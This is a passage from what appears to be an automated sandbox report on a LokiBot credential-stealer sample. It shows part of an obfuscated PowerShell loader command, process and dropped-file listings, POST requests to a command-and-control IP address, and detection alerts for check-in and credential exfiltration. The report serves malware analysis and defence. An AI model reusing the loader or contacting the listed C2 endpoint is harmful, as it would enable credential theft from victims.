gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6876 | "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t" | C:\Windows\SysWOW64\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
13 444
Read events
13 444
Write events
0
Delete events
0
Modification events
Executable files
1
Suspicious files
13
Text files
5
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6052 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 6696 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qrtlfydg.hke.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1680 | wabmig.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | der | |
MD5:E935BC5762068CAF3E24A2683B1B8A88 | SHA256:A8ACCFCFEB51BD73DF23B91F4D89FF1A9EB7438EF5B12E8AFDA1A6FF1769E89D | |||
| 6052 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zqd1hkym.yqk.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1680 | wabmig.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | binary | |
MD5:B2A7042196C8B9953479B44DA49A259A | SHA256:A5D9FFD204167522DA89B616CD447DB242BBC747529BF3C3EEEBC1B3CBF49AC0 | |||
| 1680 | wabmig.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_058F778FC8346DE378B15A5652BAADD9 | binary | |
MD5:89AD8418D69C53FDD52B6A5B50715E99 | SHA256:DB775CDB78451D7977FD18BC3477908E9B1E983693079E77C98A33271E10A988 | |||
| 1680 | wabmig.exe | C:\Users\admin\AppData\Roaming\F3F363\3C28B3.hdb | binary | |
MD5:1013079A9BF8FFA458C230EA6AAF8A89 | SHA256:1B1F3BCE8DF0FC7E33B518DAB09D09AF3680E39BCC3C760DADCC50C931007BE8 | |||
| 1680 | wabmig.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_058F778FC8346DE378B15A5652BAADD9 | der | |
MD5:719F149792B69B43A8DC3996B199FF5A | SHA256:38A7BE35D002EA7ABCC4AFDABD60F7F74D28FDA0116DB3E8BA800559DDCF72D1 | |||
| 6696 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:AF46A408A682009DEDFB7A302809C681 | SHA256:032912DA60B4B3B67EA5A9E0669B8BEC10AA921874ACCE3CAE474E96501C1B08 | |||
| 1680 | wabmig.exe | C:\Users\admin\AppData\Roaming\F3F363\3C28B3.lck | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
34
DNS requests
19
Threats
10
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
2092 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 142.250.74.195:80 | http://c.pki.goog/r/r1.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 142.250.185.99:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl | unknown | — | — | whitelisted |
— | — | GET | 200 | 142.250.185.99:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz | unknown | — | — | whitelisted |
— | — | GET | 200 | 142.250.184.227:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | unknown | — | — | whitelisted |
— | — | POST | 500 | 137.184.191.215:80 | http://137.184.191.215/index.php/check?post=073989953 | unknown | — | — | unknown |
— | — | POST | 500 | 137.184.191.215:80 | http://137.184.191.215/index.php/check?post=073989953 | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
6784 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4032 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
— | — | 52.168.117.169:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
4324 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6696 | powershell.exe | 142.250.184.206:443 | drive.google.com | GOOGLE | US | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
drive.google.com |
| shared |
drive.usercontent.google.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
ocsp.pki.goog |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | A Network Trojan was detected | ET MALWARE LokiBot User-Agent (Charon/Inferno) |
— | — | Malware Command and Control Activity Detected | ET MALWARE LokiBot Checkin |
— | — | A Network Trojan was detected | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 |
— | — | A Network Trojan was detected | ET MALWARE LokiBot User-Agent (Charon/Inferno) |
— | — | Malware Command and Control Activity Detected | ET MALWARE LokiBot Checkin |
— | — | Malware Command and Control Activity Detected | ET MALWARE LokiBot Checkin |
— | — | A Network Trojan was detected | ET MALWARE LokiBot User-Agent (Charon/Inferno) |
— | — | A Network Trojan was detected | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 |
— | — | Malware Command and Control Activity Detected | ET MALWARE LokiBot Request for C2 Commands Detected M1 |
— | — | Malware Command and Control Activity Detected | ET MALWARE LokiBot Request for C2 Commands Detected M2 |